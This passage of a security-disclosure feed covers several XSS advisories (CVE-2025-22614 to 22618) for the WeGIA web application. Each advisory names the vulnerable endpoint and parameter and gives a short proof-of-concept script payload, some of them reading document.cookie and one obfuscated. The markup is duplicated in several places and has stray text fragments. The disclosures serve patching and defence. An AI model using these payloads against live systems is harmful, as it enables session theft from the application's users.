browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-fhpx-54ch-ccxh" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-fhpx-54ch-ccxh</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/angelo50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" >Angelo Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a>code</p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22614/ https://www.cvehunters.com/p/cve-2025-22614/ <h2 id="cve-2025-22614-cross-site-scripting-xss-stored-endpoint-dependente_editarinfopessoalphp-parameters-nome-and-sobrenomeform">CVE-2025-22614: Cross-Site Scripting (XSS) Stored endpoint <code>dependente_editarInfoPessoal.php</code> parameters <code>nome</code> and <code>SobrenomeForm</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22614" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22614</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>dependente_editarInfoPessoal.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> and <code>SobrenomeForm</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-22614-cross-site-scripting-xss-stored-endpoint-dependente_editarinfopessoalphp-parameters-nome-and-sobrenomeform">CVE-2025-22614: Cross-Site Scripting (XSS) Stored endpoint <code>dependente_editarInfoPessoal.php</code> parameters <code>nome</code> and <code>SobrenomeForm</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22614" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22614</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>dependente_editarInfoPessoal.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> and <code>SobrenomeForm</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/funcionario/dependente_editarInfoPessoal.php</code></p> <p>Parameter: <code>nome</code>, <code>SobrenomeForm</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>dependente_editarInfoPessoal.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22614/402263996-0dc9369b-0906-495e-bf27-3ef10a308c40.png" width="932" height="396" srcset="/p/cve-2025-22614/402263996-0dc9369b-0906-495e-bf27-3ef10a308c40_hu_cce60f360bd4be85.png 480w, /p/cve-2025-22614/402263996-0dc9369b-0906-495e-bf27-3ef10a308c40_hu_2bb4314fbc8a3c83.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="235" data-flex-basis="564px" /></p> <p><img src="/p/cve-2025-22614/402262348-475ba360-6014-4b73-8581-c1909da8ccc4.png" width="806" height="208" srcset="/p/cve-2025-22614/402262348-475ba360-6014-4b73-8581-c1909da8ccc4_hu_e383c719baa38c71.png 480w, /p/cve-2025-22614/402262348-475ba360-6014-4b73-8581-c1909da8ccc4_hu_fa90d728b9bcefea.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="387" data-flex-basis="930px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-wr55-2952-79rh" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-wr55-2952-79rh</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p>code<a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22615/ https://www.cvehunters.com/p/cve-2025-22615/ <h2 id="cve-2025-22615-cross-site-scripting-xss-reflected-endpoint-cadastro_atendidophp-parameter-cpf">CVE-2025-22615: Cross-Site Scripting (XSS) Reflected endpoint <code>Cadastro_Atendido.php</code> parameter <code>cpf</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22615" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22615</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>Cadastro_Atendido.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>cpf</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/atendido/Cadastro_Atendido.php</code></p> <p>Parameter: <code>cpf</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>cpf</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p><h2 id="cve-2025-22615-cross-site-scripting-xss-reflected-endpoint-cadastro_atendidophp-parameter-cpf">CVE-2025-22615: Cross-Site Scripting (XSS) Reflected endpoint <code>Cadastro_Atendido.php</code> parameter <code>cpf</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22615" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22615</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>Cadastro_Atendido.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>cpf</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/atendido/Cadastro_Atendido.php</code></p> <p>Parameter: <code>cpf</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>cpf</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22615/402263494-61a235e6-0b07-436e-9f0b-96b50b59b7b5.png" width="936" height="307" srcset="/p/cve-2025-22615/402263494-61a235e6-0b07-436e-9f0b-96b50b59b7b5_hu_7d03079a9d75aabb.png 480w, /p/cve-2025-22615/402263494-61a235e6-0b07-436e-9f0b-96b50b59b7b5_hu_4ea9c358216690.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="304" data-flex-basis="731px" /></p> <p><img src="/p/cve-2025-22615/402263529-aa784a4d-9a41-47b8-ae5e-614fcdff3189.png" width="805" height="239" srcset="/p/cve-2025-22615/402263529-aa784a4d-9a41-47b8-ae5e-614fcdff3189_hu_537486d569a4ba6c.png 480w, /p/cve-2025-22615/402263529-aa784a4d-9a41-47b8-ae5e-614fcdff3189_hu_effe3aded036fc06.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="336" data-flex-basis="808px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> Reflected cross-site scripting (XSS) attacks can have serious consequences, including: <ul> <li>User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.</li> <li>Data theft: Attackers can exfiltrate data or install malware on the user's machine.</li> <li>Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.</li> <li>Malicious code: Attackers can execute malicious code on the user's system.</li> <li>Business reputation damage: Attackers can deface a corporate website or spread misinformation.</li> <li>Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6q73-74pc-p3c8" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6q73-74pc-p3c8</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/angelo50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" >Angelo Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a>code</p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22616/ https://www.cvehunters.com/p/cve-2025-22616/ <h2 id="cve-2025-22616-cross-site-scripting-xss-stored-endpoint-dependente_parentesco_adicionarphp-parameter-descricao">CVE-2025-22616: Cross-Site Scripting (XSS) Stored endpoint <code>dependente_parentesco_adicionar.php</code> parameter <code>descricao</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22616" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22616</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>dependente_parentesco_adicionar.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>descricao</code> and <code>SobrenomeForm</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p><h2 id="cve-2025-22616-cross-site-scripting-xss-stored-endpoint-dependente_parentesco_adicionarphp-parameter-descricao">CVE-2025-22616: Cross-Site Scripting (XSS) Stored endpoint <code>dependente_parentesco_adicionar.php</code> parameter <code>descricao</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22616" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22616</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>dependente_parentesco_adicionar.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>descricao</code> and <code>SobrenomeForm</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/funcionario/dependente_parentesco_adicionar.php</code></p> <p>Parameter: <code>descricao</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>dependente_parentesco_adicionar.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">top</span><span class="p">[</span><span class="mf">8680439.</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">30</span><span class="p">)](</span><span class="mi">1337</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22616/402264398-5c931c5a-7a42-4b3e-b826-b68643796162.png" width="957" height="346" srcset="/p/cve-2025-22616/402264398-5c931c5a-7a42-4b3e-b826-b68643796162_hu_29aea712a3d15039.png 480w, /p/cve-2025-22616/402264398-5c931c5a-7a42-4b3e-b826-b68643796162_hu_cadb7982497ab7a7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="276" data-flex-basis="663px" /></p> <p><img src="/p/cve-2025-22616/402264453-587bf533-3156-4c17-919d-c732200374ae.png" width="807" height="174" srcset="/p/cve-2025-22616/402264453-587bf533-3156-4c17-919d-c732200374ae_hu_7e7d976db95b44f5.png 480w, /p/cve-2025-22616/402264453-587bf533-3156-4c17-919d-c732200374ae_hu_bc681493668c4816.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="463" data-flex-basis="1113px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xm3h-x3rv-whr5code" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xm3h-x3rv-whr5code</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/angelo50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" >Angelo Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22617/ https://www.cvehunters.com/p/cve-2025-22617/ <h2 id="cve-2025-22617-cross-site-scripting-xss-reflected-endpoint-editar_sociophp-parameter-socio">CVE-2025-22617: Cross-Site Scripting (XSS) Reflected endpoint <code>editar_socio.php</code> parameter <code>socio</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22617" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22617</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>editar_socio.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>socio</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/socio/sistema/editar_socio.php</code></p> <p>Parameter: <code>socio</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>socio</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p><h2 id="cve-2025-22617-cross-site-scripting-xss-reflected-endpoint-editar_sociophp-parameter-socio">CVE-2025-22617: Cross-Site Scripting (XSS) Reflected endpoint <code>editar_socio.php</code> parameter <code>socio</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22617" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22617</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>editar_socio.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>socio</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/socio/sistema/editar_socio.php</code></p> <p>Parameter: <code>socio</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>socio</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-22617/402265755-9bd2f77d-8a4b-405e-83bd-d87747999dd2.png" width="892" height="293" srcset="/p/cve-2025-22617/402265755-9bd2f77d-8a4b-405e-83bd-d87747999dd2_hu_d4929791eada530f.png 480w, /p/cve-2025-22617/402265755-9bd2f77d-8a4b-405e-83bd-d87747999dd2_hu_3ab5db8d72eac55c.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="304" data-flex-basis="730px" /></p> <p><img src="/p/cve-2025-22617/402265684-5c5e0611-6699-440d-8e65-d1729f19ab63.png" width="805" height="200" srcset="/p/cve-2025-22617/402265684-5c5e0611-6699-440d-8e65-d1729f19ab63_hu_71f9fc1d6ef51684.png 480w, /p/cve-2025-22617/402265684-5c5e0611-6699-440d-8e65-d1729f19ab63_hu_c9f8d7edc65581d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="402" data-flex-basis="966px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> Reflected cross-site scripting (XSS) attacks can have serious consequences, including: <ul> <li>User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.</li> <li>Data theft: Attackers can exfiltrate data or install malware on the user's machine.</li> <li>Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.</li> <li>Malicious code: Attackers can execute malicious code on the user's system.</li> <li>Business reputation damage: Attackers can deface a corporate website or spread misinformation.</li> <li>Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8cp5-vr69-h8xx" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8cp5-vr69-h8xx</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributorscode">Contributorscode </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-22618/ https://www.cvehunters.com/p/cve-2025-22618/ <h2 id="cve-2025-22618-cross-site-scripting-xss-stored-endpoint-adicionar_cargophp-parameter-cargo">CVE-2025-22618: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_cargo.php</code> parameter <code>cargo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22618" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22618</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_cargo.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>cargo</code> parametercode. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/adicionar_cargo.php</code></p><h2 id="cve-2025-22618-cross-site-scripting-xss-stored-endpoint-adicionar_cargophp-parameter-cargo">CVE-2025-22618: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_cargo.php</code> parameter <code>cargo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-22618" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-22618</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_cargo.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>cargo</code> parametercode. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/adicionar_cargo.php</code></p> <p>Parameter: <code>cargo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>adicionar_cargo.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" 